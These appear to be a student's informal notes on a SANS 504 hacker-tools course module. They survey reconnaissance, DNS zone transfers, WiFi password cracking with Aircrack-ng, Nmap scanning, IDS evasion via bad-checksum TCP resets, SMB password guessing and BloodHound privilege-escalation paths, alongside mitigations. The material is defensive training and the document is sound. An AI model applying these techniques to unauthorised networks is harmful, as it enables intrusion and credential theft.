SANS 504.
2
To Create an effective defense, we must understand the
offensive tools attackers use, That’s what this book is all about
Attack Trends
💡 First rule is Always Get Permission, and it needs to be in writing.
Most of the new IoT devices lack security, As there is price competition between
vendors and short-to-market development cycles.
Industry experts expects 5.7B IoT devices by 2025
Crowd Strike report indicates the nation-state attackers are getting faster, reducing
breakout time:
Russia: 20 min, North Korea: 140 min, China: 240 min, Iran: 309 min
This means you have about 3.5 hours to respond to an initial compromise of
your network.
The bottom line here is that we live in the Golden Age of hacking,
But it’s also the golden age of information security. The two go hand
in hand
Reconnaissance
SANS 504.2 1
� The internet is a teasure trove of information for a curious
attacker
Before your first packet to a target you should collect OSINT data
OSINT used both Offensively and Defensively, as we’ll see in this module.
Some OSINT techniques:
whois , Collect Information about the registrant
, history information about the target, but you gotta give them 1$ per
😟
12whois
one lookup
Reverse whois
Gather information about targets, which CAs are in use
have i been pwned website
SpiderFoot, provide domain name, hostname or email addresses
OSINT great for attackers since it doesn’t generate logs.
After OSINT stop, they do some active scanning
DNS Interrrogation
SANS 504.2 2
� The attacker’s goal is to discover as many IP addresses
associated with the target domain as possible.
the nslookup command can be used to interact with the DNS server to get this
data.
Dig is another useful tool for DNS recon
Using the same technique we can do the same in UNIX
dig @DNSserver any,or AXFR target.com
You can do DNS brute force
To mitigate this type of attack, don’t allow zone transfer from just any system,
Use split DNS, Make sure your DNS servers are hardened.
SANS 504.2 3
� Website Searches
You should check Press realeases, white papers, design documents, contacts,
etc…
Check Public databases, job sites and hacker sites
Pushpin, it’s a social media geolocation using Flicker and google photo
metadata
pulls all available social media posts from that area
can map targetes to behavior patterns
Search Engines
The easist way to get information is to ask for it, Who ?
Google, Bing, Baidu, Yahoo and Shodan
There is also GHDB
he talked about some google dorks
Waybackurls
Many files (.doc, .xls, .pdf, .jpeg) have metadata that can be useful for attackers
like:
Usernames, directory path, vulnerable version of sw
If you are trying to extract the metadata manually it’s like a pain in the ass
process, Luckily for us we got FOCA, which automates this process for us.
SANS 504.2 4
� Recon-ng by Tim Tomes, is another powerful recon tool
Bihshop Fox’s SearchDiggity is a fantastic suite that includes Google Diggity
Maltego it’s an intelligence-gathering tool that searches through various public
information sources
Gathers information about relationship between people, social networks,
companies etc….
Numerous webistes offer the capability to research or even attack other sites
Shodan
tools.dnsstuff.com
www.network-tools.com
www.securityspace.com
Shodan is an online service that crawls the internet in much the
same way google crawls webpages, and it checks for open ports
Scanning
War Dialing
SANS 504.2 5
� War Dialing, it’s an old technique, but still amazingly successful
This technique is used to attack voicmail systems
HD Moore released a tool called WarVOX that focueses on conducting war-
dialing assesments of target telephone number ranges
War Driving
The indentification of wirless networks was known as war driving
Wifi Networks are an attractive target for attackers
Some tools we use for scanning wifi:
inSSIDer
from Metageek uses active and passive scanning with a standard WI-FI
card on Windows. Identifies SSID, channel information, Integrates with a
GPS for location mapping.
WiFi Analyzer
SANS 504.2 6
� gather similar data but for android devices
Kismet
Captures WiFi activity, provides detailed information about networks and
clients as they are seen.
It’s completely passive
PSK-based WiFi auth is simple and inexpensive to deploy, but it’s susceptible to
offline password guessing
AFter getting the ouptut of Kismet we can use Aircrack-ng to
crack the password with a wordlist
SANS 504.2 7
� Possible to impersonate open APs without special hardware, ILMN is Linux
virtual machine to impersonate AP
Non-WiFi attacks are less common, but no less damaging to
your organization
Beyond WiFi there are many other vulnerabilities:
Insecure protocol
Bluetooth
automation controls over ZigBee
automation systems over Z-Wave
Vulnerable RFID systems for door locks.
PSK it is not appropriate for enterprise networks, you should deploy WPA2 with
a plan to deploy WPA3
For Identifying wireless intruders, you could look for the appearance of renegade
access points or strange messages sent by intuding wireless clients.
SANS 504.2 8
� Also. For detecting renegade access points, Cisco offer built-in capabilities in
existing access points to detect unregistered access points that appear in your
environment.
This tools it’s widely used by law enforcement to identify criminals using WiFi
access points
Nmap is an essential tool for attackers and defenders alike!
Nmap sends four packets to identify UP hosts:
ICMP Echo request
TCP SYN to port 443
TCP ACK to port 80
ICMP Timestamp request
Once Nmap finishes conducting a network sweep and its tracerouting activities,
The Zenmap GUI can provide an interactive graphical portrayal of the network
SANS 504.2 9
� To mitigate get scanned, he recommended diabling ICMP Echo request
messages, But your users couldn’t ping you.
Or if you notice a particularly frequent ping sweep, you could temporarily block
source address.
SANS 504.2 10
� SYN scan it the stealthiest one as it doesn’t complete the connection, and
most systems don’t log uncompleted connection.
ACK Scans are useful for mapping, but not for port scanning, Useful for finding
sensitive internal systems post-exploitation.
More than 30 methods are used for Nmap OS fingerprinting
Traditional Port scanning can be slow with Nmap.
Masscan, separating SYN send from ACK receive, which is way faster than
Nmap.
EyeWitness, takes screenshots of websites, VNC and RDP services
SANS 504.2 11
� Evading IPS, IDS
Many IDS/IPS systems do not validate the TCP checksum
An attacker can insert a TCP Reset with an invalid checksum to clear the
IDS/IPS buffer.
Many attackers today abuse services and protocols your environment uses
every day.
SSH, RDP, Citrix, OWA
Attackers will use an exploit /payload combination on the intitial attack, but will
switch to stolen user credentials as soon as possible.
As some mitigation for the evasion:
Keep your IDS, IPS up to date
For sensitive systems, use host-based IDS in addition to network-based IDS
and IPS.
Implement User behavioral analytics
Utilize host-based IDS/IPS
Vulnerability Scanners
SANS 504.2 12
� Many commercial Scanners:
Rapid7
SAINT
beyondTrust
Nessus
OpenVAS
Talked about NESSUS, the most popluar one “Check the room on try hack
me”
SMB sessions
SMB is an application-layer protocol that implements file and printer sharing,
domain auth, remote admin, and other features.
SMB is heavily used by attackers, often appearing as “normal”
TCP/445 traffic. it is an essential protocol to understand for
defenders.
Establishing and SMB session from windows:
SMB Password Guessing:
SANS 504.2 13
� BloodHound
A tool that graphs the quickest way to get domain administrator privileges.
For example:
Gain access as a Domain user.
Find all systems
Find oen of those systems where a domain administrators is logged on
Steal the domain administrator’s access.
SANS 504.2 14
